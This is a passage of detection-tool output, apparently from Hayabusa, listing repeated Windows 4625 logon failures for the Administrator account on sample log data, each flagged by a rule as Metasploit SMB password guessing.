Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
